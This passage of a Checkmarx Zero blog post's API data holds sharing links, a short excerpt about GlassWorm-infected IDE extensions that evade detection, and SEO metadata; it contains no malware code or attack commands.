href=\"https:\/\/bsky.app\/intent\/compose?text=I%20just%20read%20%22{title}%22%20from%20Checkmarx%20Zero%20{url}\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" shape-rendering=\"geometricPrecision\" text-rendering=\"geometricPrecision\" image-rendering=\"optimizeQuality\" fill-rule=\"evenodd\" clip-rule=\"evenodd\" alt=\"Bluesky Icon\" viewbox=\"0 0 511.999 452.266\"> <path fill=\"#0085FF\" fill-rule=\"nonzero\" d=\"M110.985 30.442c58.695 44.217 121.837 133.856 145.013 181.961 23.176-48.105 86.322-137.744 145.016-181.961 42.361-31.897 110.985-56.584 110.985 21.96 0 15.681-8.962 131.776-14.223 150.628-18.272 65.516-84.873 82.228-144.112 72.116 103.55 17.68 129.889 76.238 73 134.8-108.04 111.223-155.288-27.905-167.385-63.554-3.489-10.262-2.991-10.498-6.561 0-12.098 35.649-59.342 174.777-167.382 63.554-56.89-58.562-30.551-117.12 72.999-134.8-59.239 10.112-125.84-6.6-144.112-72.116C8.962 184.178 0 68.083 0 52.402c0-78.544 68.633-53.857 110.985-21.96z\"><\/path><\/svg> Share on Bluesky<\/a><\/span> <\/p>\n<p class=\"cxzero-social-links\">Follow <a href=\"\/zero\/\">Checkmarx Zero<\/a>: <span class=\"social-link\"><a class=\"social-con\" href=\"https:\/\/www.linkedin.com\/showcase\/checkmarx-zero\"><svg id=\"Layer_1\" data-name=\"Layer 1\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" alt=\"Checkmarx Zero on LinkedIn\" viewbox=\"0 0 122.88 122.31\"><defs><style>.cls-1{fill:#0a66c2}.cls-1,.cls-2{fill-rule:evenodd}.cls-2{fill:#fff}<\/style><\/defs><title>linkedin-app<\/title>\n<path class=\"cls-1\" d=\"M27.75,0H95.13a27.83,27.83,0,0,1,27.75,27.75V94.57a27.83,27.83,0,0,1-27.75,27.74H27.75A27.83,27.83,0,0,1,0,94.57V27.75A27.83,27.83,0,0,1,27.75,0Z\"><\/path><path class=\"cls-2\" d=\"M49.19,47.41H64.72v8h.22c2.17-3.88,7.45-8,15.34-8,16.39,0,19.42,10.2,19.42,23.47V98.94H83.51V74c0-5.71-.12-13.06-8.42-13.06s-9.72,6.21-9.72,12.65v25.4H49.19V47.41ZM40,31.79a8.42,8.42,0,1,1-8.42-8.42A8.43,8.43,0,0,1,40,31.79ZM23.18,47.41H40V98.94H23.18V47.41Z\"><\/path><\/svg> <\/a><\/span> <span class=\"social-link\"><a class=\"social-icon\" href=\"https:\/\/bsky.app\/profile\/checkmarxzero.bsky.social\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" shape-rendering=\"geometricPrecision\" text-rendering=\"geometricPrecision\" image-rendering=\"optimizeQuality\" fill-rule=\"evenodd\" clip-rule=\"evenodd\" alt=\"Checkmarx Zero on Bluesky\" viewbox=\"0 0 511.999 452.266\"> <path fill=\"#0085FF\" fill-rule=\"nonzero\" d=\"M110.985 30.442c58.695 44.217 121.837 133.856 145.013 181.961 23.176-48.105 86.322-137.744 145.016-181.961 42.361-31.897 110.985-56.584 110.985 21.96 0 15.681-8.962 131.776-14.223 150.628-18.272 65.516-84.873 82.228-144.112 72.116 103.55 17.68 129.889 76.238 73 134.8-108.04 111.223-155.288-27.905-167.385-63.554-3.489-10.262-2.991-10.498-6.561 0-12.098 35.649-59.342 174.777-167.382 63.554-56.89-58.562-30.551-117.12 72.999-134.8-59.239 10.112-125.84-6.6-144.112-72.116C8.962 184.178 0 68.083 0 52.402c0-78.544 68.633-53.857 110.985-21.96z\"><\/path><\/svg> <\/a><\/span> <span class=\"social-link\"><a class=\"social-con\" href=\"https:\/\/x.com\/CheckmarxZero\"><svg alt=\"Checkmarx Zero on X\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" shape-rendering=\"geometricPrecision\" text-rendering=\"geometricPrecision\" image-rendering=\"optimizeQuality\" fill-rule=\"evenodd\" clip-rule=\"evenodd\" viewbox=\"0 0 512 462.799\"><path fill-rule=\"nonzero\" d=\"M403.229 0h78.506L310.219 196.04 512 462.799H354.002L230.261 301.007 88.669 462.799h-78.56l183.455-209.683L0 0h161.999l111.856 147.88L403.229 0zm-27.556 415.805h43.505L138.363 44.527h-46.68l283.99 371.278z\"><\/path><\/svg> <\/a><\/span> <\/p> <script>function social_action_template(a){const b=encodeURIComponent(window.location.href);const c=document.querySelector(\"h1\");let headContent=(c==null?\"\":c.textContent);let processed=a.replace(\/\\{title\\}\/g,encodeURIComponent(headContent));processed=processed.replace(\/\\{url\\}\/g,b);return processed}var socialAction=document.getElementsByClassName(\"social-action\");console.log(socialAction);for(e=0;e<socialAction.length;e++){element=socialAction.item(e);console.log(element);element.href=social_action_template(element.href)};<\/script> <\/div>\n\n\n\n<p><\/p>","protected":false},"excerpt":{"rendered":"<p>The GlassWorm malware campaign continues to adapt to defender detection tactics. The latest round of GlassWorm-infected IDE extensions target developers and use novel tactics to evade prior detections. Learn how this new tactic works and how to defend.<\/p>\n","protected":false},"author":164,"featured_media":107819,"template":"","zero-category":[1176,1104],"zero-tag":[1505,1504,1336,1458],"class_list":["post-107815","zero-post","type-zero-post","status-publish","has-post-thumbnail","hentry","zero-category-security-blogs","zero-category-technical-blog","zero-tag-deep-dive","zero-tag-glassworm","zero-tag-malicious-package","zero-tag-vscode-extension"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.1.1 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>GlassWorm Malware Targets Developer IDEs Again - Checkmarx Zero<\/title>\n<meta name=\"description\" content=\"The latest round of GlassWorm-infected IDE extensions target developers and use novel tactics to evade prior detections.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/checkmarx.com\/zero-post\/glassworm-targets-developer-ides-again-hiding-staged-malware-behind-runtime-rebuilt-loaders\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"GlassWorm Malware Targets Developer IDEs Again - Checkmarx Zero\" \/>\n<meta property=\"og:description\" content=\"The GlassWorm malware campaign continues to adapt to defender detection tactics. The latest round of GlassWorm-infected IDE extensions target developers and use novel tactics to evade prior detections. Learn how this new tactic works and how to defend.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/checkmarx.com\/zero-post\/glassworm-targets-developer-ides-again-hiding-staged-malware-behind-runtime-rebuilt-loaders\/\" \/>\n<meta property=\"og:site_name\" content=\"Checkmarx\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/Checkmarx.Source.Code.Analysis\" \/>\n<meta property=\"article:modified_time\" content=\"2026-04-01T14:48:24+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/checkmarx.com\/wp-content\/uploads\/2026\/03\/cxzero-feature_glassworm-solana-dynamic-ide-malware-malicious.webp\" \/>\n\t<meta property=\"og:image:width\" content=\"2560\" \/>\n\t<meta property=\"og:image:height\" content=\"1280\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/webp\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:site\" content=\"@checkmarx\" \/>\n<meta name=\"twitter:label1\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data1\" content=\"13 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/checkmarx.com\/zero-post\/glassworm-targets-developer-ides-again-hiding-staged-malware-behind-runtime-rebuilt-loaders\/\",\"url\":\"https:\/\/checkmarx.com\/zero-post\/glassworm-targets-developer-ides-again-hiding-staged-malware-behind-runtime-rebuilt-loaders\/\",\"name\":\"GlassWorm Malware Targets Developer IDEs Again - Checkmarx Zero\",\"isPartOf\":{\"@id\":\"https:\/\/checkmarx.com\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/checkmarx.com\/zero-post\/glassworm-targets-developer-ides-again-hiding-staged-malware-behind-runtime-rebuilt-loaders\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/checkmarx.com\/zero-post\/glassworm-targets-developer-ides-again-hiding-staged-malware-behind-runtime-rebuilt-loaders\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/checkmarx.com\/wp-content\/uploads\/2026\/03\/cxzero-feature_glassworm-solana-dynamic-ide-malware-malicious.webp\",\"datePublished\":\"2026-03-23T13:00:00+00:00\",\"dateModified\":\"2026-04-01T14:48:24+00:00\",\"description\":\"The latest round of GlassWorm-infected IDE extensions target developers and use novel tactics to evade prior detections.\",\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/checkmarx.com\/zero-post\/glassworm-targets-developer-ides-again-hiding-staged-malware-behind-runtime-rebuilt-loaders\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/checkmarx.com\/zero-post\/glassworm-targets-developer-ides-again-hiding-staged-malware-behind-runtime-rebuilt-loaders\/#primaryimage\",\"url\":\"https:\/\/checkmarx.com\/wp-content\/uploads\/2026\/03\/cxzero-feature_glassworm-solana-dynamic-ide-malware-malicious.webp\",\"contentUrl\":\"https:\/\/checkmarx.com\/wp-content\/uploads\/2026\/03\/cxzero-feature_glassworm-solana-dynamic-ide-malware-malicious.webp\",\"width\":2560,\"height\":1280,\"caption\":\"Digital illustration of a glass worm, indicative of the GlassWorm malware campaign, coiling around computer screens showing code, data grids, and application icons. A dark, grungy cityscape is in the background. 'Checkmarx ZERO' branding is in the corner.\"},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/checkmarx.com\/#website\",\"url\":\"https:\/\/checkmarx.com\/\",\"name\":\"Checkmarx\",\"description\":\"The world runs on code. We secure it.\",\"publisher\":{\"@id\":\"https:\/\/checkmarx.com\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/checkmarx.com\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/checkmarx.com\/#organization\",\"name\":\"Checkmarx\",\"url\":\"https:\/\/checkmarx.com\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/checkmarx.com\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/checkmarx.com\/wp-content\/uploads\/2024\/02\/logo-dark.svg\",\"contentUrl\":\"https:\/\/checkmarx.com\/wp-content\/uploads\/2024\/02\/logo-dark.svg\",\"width\":1,\"height\":1,\"caption\":\"Checkmarx\"},\"image\":{\"@id\":\"https:\/\/checkmarx.com\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/Checkmarx.Source.Code.Analysis\",\"https:\/\/x.com\/checkmarx\",\"https:\/\/www.youtube.com\/user\/CheckmarxResearchLab\",\"https:\/\/www.linkedin.com\/company\/checkmarx\"]}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"GlassWorm Malware Targets Developer IDEs Again - Checkmarx Zero","description":"The latest round of GlassWorm-infected IDE extensions target developers and use novel tactics to evade prior detections.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/checkmarx.com\/zero-post\/glassworm-targets-developer-ides-again-hiding-staged-malware-behind-runtime-rebuilt-loaders\/","og_locale":"en_US","og_type":"article","og_title":"GlassWorm Malware Targets Developer IDEs Again - Checkmarx Zero","og_description":"The GlassWorm malware campaign continues to adapt to defender detection tactics. The latest round of GlassWorm-infected IDE extensions target developers and use novel tactics to evade prior detections. Learn how this new tactic works and how to defend.","og_url":"https:\/\/checkmarx.com\/zero-post\/glassworm-targets-developer-ides-again-hiding-staged-malware-behind-runtime-rebuilt-loaders\/","og_site_name":"Checkmarx","article_publisher":"https:\/\/www.facebook.com\/Checkmarx.Source.Code.Analysis","article_modified_time":"2026-04-01T14:48:24+00:00","og_image":[{"width":2560,"height":1280,"url":"https:\/\/checkmarx.com\/wp-content\/uploads\/2026\/03\/cxzero-feature_glassworm-solana-dynamic-ide-malware-malicious.webp","type":"image\/webp"}],"twitter_card":"summary_large_image","twitter_site":"@checkmarx","twitter_misc":{"Est. reading time":"13 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/checkmarx.com\/zero-post\/glassworm-targets-developer-ides-again-hiding-staged-malware-behind-runtime-rebuilt-loaders\/","url":"https:\/\/checkmarx.com\/zero-post\/glassworm-targets-developer-ides-again-hiding-staged-malware-behind-runtime-rebuilt-loaders\/","name":"GlassWorm Malware Targets Developer IDEs Again - Checkmarx Zero","isPartOf":{"@id":"https:\/\/checkmarx.com\/#website"},"primaryImageOfPage":{"@id":"https:\/\/checkmarx.com\/zero-post\/glassworm-targets-developer-ides-again-hiding-staged-malware-behind-runtime-rebuilt-loaders\/#primaryimage"},"image":{"@id":"https:\/\/checkmarx.com\/zero-post\/glassworm-targets-developer-ides-again-hiding-staged-malware-behind-runtime-rebuilt-loaders\/#primaryimage"},"thumbnailUrl":"https:\/\/checkmarx.com\/wp-content\/uploads\/2026\/03\/cxzero-feature_glassworm-solana-dynamic-ide-malware-malicious.webp","datePublished":"2026-03-23T13:00:00+00:00","dateModified":"2026-04-01T14:48:24+00:00","description":"The latest round of GlassWorm-infected IDE extensions target developers and use novel tactics to evade prior detections.","inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/checkmarx.com\/zero-post\/glassworm-targets-developer-ides-again-hiding-staged-malware-behind-runtime-rebuilt-loaders\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/checkmarx.com\/zero-post\/glassworm-targets-developer-ides-again-hiding-staged-malware-behind-runtime-rebuilt-loaders\/#primaryimage","url":"https:\/\/checkmarx.com\/wp-content\/uploads\/2026\/03\/cxzero-feature_glassworm-solana-dynamic-ide-malware-malicious.webp","contentUrl":"https:\/\/checkmarx.com\/wp-content\/uploads\/2026\/03\/cxzero-feature_glassworm-solana-dynamic-ide-malware-malicious.webp","width":2560,"height":1280,"caption":"Digital illustration of a glass worm, indicative of the GlassWorm malware campaign, coiling around computer screens showing code, data grids, and application icons. A dark, grungy cityscape is in the background. 'Checkmarx ZERO' branding is in the corner."},{"@type":"WebSite","@id":"https:\/\/checkmarx.com\/#website","url":"https:\/\/checkmarx.com\/","name":"Checkmarx","description":"The world runs on code. We secure it.","publisher":{"@id":"https:\/\/checkmarx.com\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/checkmarx.com\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/checkmarx.com\/#organization","name":"Checkmarx","url":"https:\/\/checkmarx.com\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/checkmarx.com\/#\/schema\/logo\/image\/","url":"https:\/\/checkmarx.com\/wp-content\/uploads\/2024\/02\/logo-dark.svg","contentUrl":"https:\/\/checkmarx.com\/wp-content\/uploads\/2024\/02\/logo-dark.svg","width":1,"height":1,"caption":"Checkmarx"},"image":{"@id":"https:\/\/checkmarx.com\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/Checkmarx.Source.Code.Analysis","https:\/\/x.com\/checkmarx","https:\/\/www.youtube.com\/user\/CheckmarxResearchLab","https:\/\/www.linkedin.com\/company\/checkmarx"]}]}},"_links":{"self":[{"href":"https:\/\/checkmarx.com\/wp-json\/wp\/v2\/zero-post\/107815","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/checkmarx.com\/wp-json\/wp\/v2\/zero-post"}],"about":[{"href":"https:\/\/checkmarx.com\/wp-json\/wp\/v2\/types\/zero-post"}],"author":[{"embeddable":true,"href":"https:\/\/checkmarx.com\/wp-json\/wp\/v2\/users\/164"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/checkmarx.com\/wp-json\/wp\/v2\/media\/107819"}],"wp:attachment":[{"href":"https:\/\/checkmarx.com\/wp-json\/wp\/v2\/media?parent=107815"}],"wp:term":[{"taxonomy":"zero-category","embeddable":true,"href":"https:\/\/checkmarx.com\/wp-json\/wp\/v2\/zero-category?post=107815"},{"taxonomy":"zero-tag","embeddable":true,"href":"https:\/\/checkmarx.com\/wp-json\/wp\/v2\/zero-tag?post=107815"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}